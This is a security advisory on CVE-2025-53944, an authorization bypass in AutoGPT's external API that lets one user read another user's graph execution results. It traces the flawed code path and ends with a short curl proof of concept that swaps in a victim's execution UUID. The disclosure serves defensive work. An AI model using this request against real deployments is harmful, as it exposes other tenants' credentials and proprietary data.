Gecko will be at Black Hat and DEFCON in Las Vegas

Back to Research
CVSS 7.7highCVE-2025-53944

CVE-2025-53944: AutoGPT Authorization Bypass in Graph Execution External API

Authorization bypass vulnerability in AutoGPT's external API allowing authenticated users to access execution results from other users' graph executions.

Gecko Security Research
Gecko Security Team
1/15/2025

Description

There is an authorization bypass vulnerability in the external API that allows authenticated users to access execution results from other users' graph executions. The vulnerability exists in the get_graph_execution_results endpoint, which validates that the requesting user can access the specified graph but fails to validate ownership of the execution ID parameter.

The endpoint performs proper authorization for the graph_id parameter by calling get_graph() with the authenticated user's ID, ensuring the user owns or has access to the graph. However, it then directly queries execution data using the user-supplied graph_exec_id without validating that this execution belongs to the authorized graph or the requesting user. Notably, the internal API endpoint /graphs/{graph_id}/executions/{graph_exec_id} implements the correct authorization pattern, performing both execution ownership validation and graph relationship verification.

This IDOR vulnerability allows attackers to access sensitive execution data including input parameters (potentially containing API keys and credentials), output results, and proprietary workflow logic from any user's graph executions, provided they can discover the target execution UUID.

Source - Sink Analysis

Source: User-controlled graph_exec_id parameter in URL path /graphs/{graph_id}/executions/{graph_exec_id}/results

Call Chain:

  1. get_graph_execution_results() function in autogpt_platform/backend/backend/server/external/routes/v1.py:115 processes external API request
  2. graph_db.get_graph(graph_id, user_id=api_key.user_id) validates user access to graph_id (authorization passes for attacker's graph)
  3. execution_db.get_node_executions(graph_exec_id) called with user-controlled execution ID at line 123
  4. Database query in get_node_executions() at autogpt_platform/backend/backend/data/execution.py:728 with where clause {"agentGraphExecutionId": graph_exec_id} - no user validation
  5. NodeExecutionResult.from_db(execution) constructs result objects containing victim's execution data
  6. Sink: Response construction returns unauthorized execution data including victim's input parameters, output results, and workflow details in GraphExecutionResult structure

Proof of Concept

Prerequisites:

  • Valid API key with READ_GRAPH permission
  • Access to at least one graph (own graph or public graph)
  • Discovery of victim's execution UUID (through logs, error messages, etc.)

Attack steps:

  1. Obtain valid API key: curl -X POST /api/api-keys -d '{"name":"test","permissions":["READ_GRAPH"]}'
  2. Discover victim execution ID through side channels or enumeration
  3. Execute attack:
curl -X GET \
  "https://platform.autogpt.co/api/graphs/ATTACKER_GRAPH_ID/executions/VICTIM_EXECUTION_UUID/results" \
  -H "X-API-Key: ATTACKER_API_KEY"

Result: Server validates access to ATTACKER_GRAPH_ID (succeeds) but returns execution data from VICTIM_EXECUTION_UUID containing sensitive input/output data, API keys, and proprietary workflow information.

Impact

  • Cross-tenant data access in multi-tenant SaaS environment
  • Exposure of API keys and credentials stored in execution inputs